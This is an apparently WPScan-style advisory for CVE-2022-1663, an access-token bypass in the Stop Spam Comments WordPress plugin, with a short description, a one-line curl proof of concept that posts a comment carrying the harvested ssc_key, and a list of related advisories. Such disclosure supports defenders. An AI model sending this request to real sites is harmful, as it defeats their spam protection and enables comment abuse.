Stop Spam Comments <= 0.2.1.2 – Access Token Bypass | CVE 2022-1663 | Plugin Vulnerabilities

Description

The plugin does not properly generate the Javascript access token for preventing abuse of comment section, allowing threat authors to easily collect the value and add it to the request.

Proof of Concept

Collect the name and value of ssc_key for the target post and use it on the request.

curl 'http://target.tld/wp-comments-post.php' -X POST --data-raw 'ssc_key_NAME=VALUE&comment=test&author=test&email=test%40test.tld&url=&submit=Post+Comment&comment_post_ID=1&comment_parent=0'

Affects Plugins

stop-spam-comments

No known fix

References

CVE

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

30820be1-e96a-4ff6-b1ec-efda14069e70

Timeline

Publicly Published

2022-08-08 (about 3 years ago)

Added

2022-08-08 (about 3 years ago)

Last Updated

2023-05-05 (about 2 years ago)

Other

Published

Title

Published

2022-12-12

Title

WP Cerber < 9.3.3 - User Enumeration Bypass via Rest API

Published

2024-06-06

Title

Contact Form Builder, Contact Widget <= 2.1.7 - Authentication Request Bypass

Published

2023-06-12

Title

Protect WP Admin < 4.0 - Unauthenticated Protection Bypass

Published

2020-03-18

Title

Gutenberg & Elementor Templates Importer For Responsive < 2.2.6 - Unprotected AJAX Endpoints

Published

2024-01-27

Title

BookingPress < 1.0.75 - Unauthenticated Booking Price Manipulation